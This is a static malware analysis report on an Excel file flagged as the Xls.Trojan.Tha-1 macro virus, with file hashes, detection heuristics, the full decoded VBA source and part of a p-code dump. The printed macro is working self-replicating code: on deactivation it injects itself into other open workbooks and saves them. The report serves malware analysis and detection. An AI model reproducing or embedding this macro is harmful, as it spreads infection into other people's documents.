Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9840232944f6ca7f…

MALICIOUS

Office (OLE)

33.5 KB Created: 1999-02-06 16:40:14 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: b19e75948a2be7972925ace9fdb29eca SHA-1: 1b3a32b4cf51480981fafb0b88cfb2d53c5c7cba SHA-256: 9840232944f6ca7f0d95256e0e61ca89d554782487ec9db9b7203c0a6c34c089
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is an Excel spreadsheet containing VBA macros. The macro code attempts to copy itself into other open workbooks, which is a common technique for malware to spread or maintain persistence. The ClamAV detection 'Xls.Trojan.Tha-1' further supports its malicious nature. No specific IOCs like URLs or file paths were directly extracted from the macro code.

Heuristics 2

  • ClamAV: Xls.Trojan.Tha-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Tha-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10446 bytes
SHA-256: b8ea3830b3d9c16ea9b685221529ed31dfd817c67c3c2bae560a7c76dbbbc62f
Detection
ClamAV: Xls.Trojan.Tha-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "DieseArbeitsmappe"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Deactivate()

Dim OurCode, ThaClass As String
Dim i As Integer
Dim Saved As Boolean

ThaClass = "DieseArbeitsmappe"

OurCode = Application.ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule.Lines(1, Application.ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)

For i = 1 To Application.Workbooks.Count

  Saved = False
  
  For j = 1 To Application.Workbooks.Item(i).VBProject.VBComponents.Count
  
    If Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines = 0 Then
    
      If Application.Workbooks.Item(i).Path <> "" And Application.Workbooks.Item(i).Saved = True And Saved = False Then Saved = True
    
      Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.InsertLines 1, OurCode
      
      If Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).Name = ThaClass Then
        Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.ReplaceLine 1, "Private Sub Workbook_Deactivate()"
      Else
        Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.ReplaceLine 1, "Private Sub Worksheet_Deactivate()"
      End If

    End If
    
  Next j
  
  If Saved = True Then Application.Workbooks.Item(i).Save

Next i

End Sub


Attribute VB_Name = "Tabelle1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_Deactivate()

Dim OurCode, ThaClass As String
Dim i As Integer
Dim Saved As Boolean

ThaClass = "DieseArbeitsmappe"

OurCode = Application.ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule.Lines(1, Application.ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)

For i = 1 To Application.Workbooks.Count

  Saved = False
  
  For j = 1 To Application.Workbooks.Item(i).VBProject.VBComponents.Count
  
    If Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines = 0 Then
    
      If Application.Workbooks.Item(i).Path <> "" And Application.Workbooks.Item(i).Saved = True And Saved = False Then Saved = True
    
      Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.InsertLines 1, OurCode
      
      If Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).Name = ThaClass Then
        Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.ReplaceLine 1, "Private Sub Workbook_Deactivate()"
      Else
        Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.ReplaceLine 1, "Private Sub Worksheet_Deactivate()"
      End If

    End If
    
  Next j
  
  If Saved = True Then Application.Workbooks.Item(i).Save

Next i

End Sub


' Processing file: /opt/analyzer/scan_staging/19123c0f9c2b4575accd6b0fb9b788b7.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/DieseArbeitsmappe - 8856 bytes
' Line #0:
' 	FuncDefn (Private Sub Workbook_Deactivate())
' Line #1:
' Line #2:
' 	Dim 
' 	VarDefn ThisWorkbook
' 	VarDefn id_0292 (As String)
' Line #3:
' 	Dim 
' 	VarDefn _B_var_For (As Integer)
' Line #4:
' 	Dim 
' 	VarDefn Saved (As Boolean)
' Line #5:
' Line #6:
' 	LitStr 0x0011 "DieseArbeitsmappe"
' 	St id_0292 
' Line #7:
' Line #8:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld Application 
' 	MemLd Lines 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd i 
' 	MemLd _B_var_If 
' 	LitDI2 0x0001 
' 	Ld Application 
' 	MemLd Lines 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd i 
' 	ArgsMemLd CountOfLines 0x0002 
' 	S
... (truncated)